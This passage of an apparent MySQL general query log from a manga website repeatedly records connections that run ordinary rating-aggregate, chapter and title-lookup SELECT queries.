as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330640360 Quit 330640361 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640361 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330640361 Quit 330640362 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640362 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330640362 Quit 330640363 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640363 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330640363 Quit 330640364 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640364 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330640364 Quit 330640365 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640365 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330640365 Quit 330640366 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640366 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330640366 Quit 330640367 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640367 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330640367 Quit 330640368 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640368 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330640368 Quit 330640369 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640369 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330640369 Quit 330640370 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640370 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330640370 Quit 330640371 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640371 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330640371 Quit 330640372 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640372 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330640372 Quit 330640373 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640373 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330640373 Quit 330640374 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640374 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330640374 Quit 330640375 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640375 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330640375 Quit 330640376 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640376 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330640376 Quit 330640377 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640377 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330640377 Quit 330640378 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640378 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330640378 Quit 330640379 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640379 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330640379 Quit 330640380 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640380 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330640380 Quit 330640381 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640381 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330640381 Quit 330640382 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640382 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330640382 Quit 330640383 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640383 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330640383 Quit 330640384 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640384 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330640384 Quit 330640385 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640385 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330640385 Quit 330640386 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640386 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330640386 Quit 330640387 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640387 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330640387 Quit 330640388 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640388 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330640388 Quit 330640389 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640389 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330640389 Quit 330640390 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640390 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330640390 Quit 330640391 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640391 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330640391 Quit 330640392 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640392 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330640392 Quit 330640393 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640393 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330640393 Quit 330640394 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640394 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330640394 Quit 330640395 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640395 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330640395 Quit 330640396 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640396 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330640396 Quit 330640397 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640397 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330640397 Quit 330640398 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640398 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330640398 Quit 330640399 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640399 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330640399 Quit 330640400 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640400 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330640400 Quit 330640401 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640401 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330640401 Quit 330640402 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640402 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330640402 Quit 330640403 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640403 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330640403 Quit 330640404 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640404 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330640404 Quit 330640405 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640405 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330640405 Quit 330640406 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640406 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330640406 Quit 330640407 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640407 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330640407 Quit 330640408 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640408 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330640408 Quit 330640409 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640409 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330640409 Quit 330640410 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640410 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330640410 Quit 330640411 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640411 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330640411 Quit 330640412 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640412 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330640412 Quit 330640413 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640413 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330640413 Quit 330640414 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640414 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330640414 Quit 330640415 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640415 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330640415 Quit 330640416 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640416 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330640416 Quit 330640417 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640417 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330640417 Quit 330640418 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640418 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330640419 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640418 Quit 330640420 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640421 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640420 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330640419 Quit 330640421 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'tsuki-no-oki-ni-mesu-mama' 330640420 Quit 330640422 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640422 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330640422 Quit 330640423 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640423 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330640423 Quit 330640424 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640424 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330640424 Quit 330640425 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640425 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330640425 Quit 330640426 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640426 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330640426 Quit 330640427 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640427 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330640427 Quit 330640428 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640428 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330640428 Quit 330640429 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640429 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330640429 Quit 330640430 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640430 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330640430 Quit 330640431 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640431 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330640431 Quit 330640432 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640432 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330640432 Quit 330640433 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640433 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330640433 Quit 330640434 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640434 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330640434 Quit 330640435 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640435 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330640435 Quit 330640436 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640436 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330640436 Quit 330640437 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640437 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330640437 Quit 330640438 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640438 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330640438 Quit 330640439 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640439 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330640439 Quit 330640440 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640440 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330640440 Quit 330640441 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640441 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330640441 Quit 330640442 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640442 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330640442 Quit 330640443 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640443 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330640443 Quit 330640444 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640444 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330640444 Quit 330640445 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640445 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330640445 Quit 330640446 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640446 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330640446 Quit 330640447 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640447 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330640447 Quit 330640448 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640448 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330640448 Quit 330640449 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640449 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330640449 Quit 330640450 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640450 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330640450 Quit 330640451 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640451 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330640451 Quit 330640452 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640452 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330640452 Quit 330640453 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640453 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330640453 Quit 330640454 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640454 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330640454 Quit 330640455 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640455 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330640455 Quit 330640456 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640456 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330640456 Quit 330640457 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640457 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330640457 Quit 330640458 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640458 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330640458 Quit 330640459 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640459 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330640459 Quit 330640460 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640460 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330640460 Quit 330640461 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640461 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330640461 Quit 330640462 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640462 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330640462 Quit 330640463 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640463 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330640463 Quit 330640464 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640464 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330640464 Quit 330640465 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640465 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330640465 Quit 330640466 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640466 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330640466 Quit 330640467 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640467 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330640467 Quit 330640468 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640468 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330640468 Quit 330640469 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640469 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330640469 Quit 330640470 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640470 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330640470 Quit 330640471 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640471 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330640471 Quit 330640472 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640472 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330640472 Quit 330640473 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640473 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330640473 Quit 330640474 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640474 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330640474 Quit 330640421 Quit 330640475 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640475 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330640476 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640475 Quit 330640476 Query select * FROM chapters where manga_id = '116' order by id desc 330640477 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640477 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330640477 Quit 330640478 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640478 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330640478 Quit 330640479 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640479 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330640479 Quit 330640480 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640480 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330640480 Quit 330640481 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640481 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330640481 Quit 330640482 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640482 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330640482 Quit 330640483 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640483 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330640483 Quit 330640484 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640484 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330640484 Quit 330640485 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640485 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330640485 Quit 330640486 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640486 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330640486 Quit 330640487 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640487 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330640487 Quit 330640488 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640488 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330640488 Quit 330640489 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640489 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330640489 Quit 330640490 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640490 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330640490 Quit 330640491 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640491 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330640491 Quit 330640492 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640492 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330640492 Quit 330640493 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640493 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330640493 Quit 330640494 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640494 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330640494 Quit 330640495 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640495 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330640495 Quit 330640496 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640496 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330640496 Quit 330640476 Quit 330640497 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640497 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330640498 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640497 Quit 330640498 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '116' and m.active = 1 330640499 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640499 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330640499 Quit 330640500 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640500 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330640500 Quit 330640501 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640501 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330640501 Quit 330640502 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640502 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330640502 Quit 330640503 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640503 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330640503 Quit 330640504 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640504 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330640504 Quit 330640505 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640505 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330640505 Quit 330640506 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640506 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330640506 Quit 330640507 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640507 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330640507 Quit 330640508 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640508 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330640508 Quit 330640509 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640509 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330640509 Quit 330640510 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640510 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330640510 Quit 330640511 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640511 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330640511 Quit 330640512 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640512 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330640512 Quit 330640513 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640513 Query select count(id) as total_rating, (sum(rating) / count(id)) as 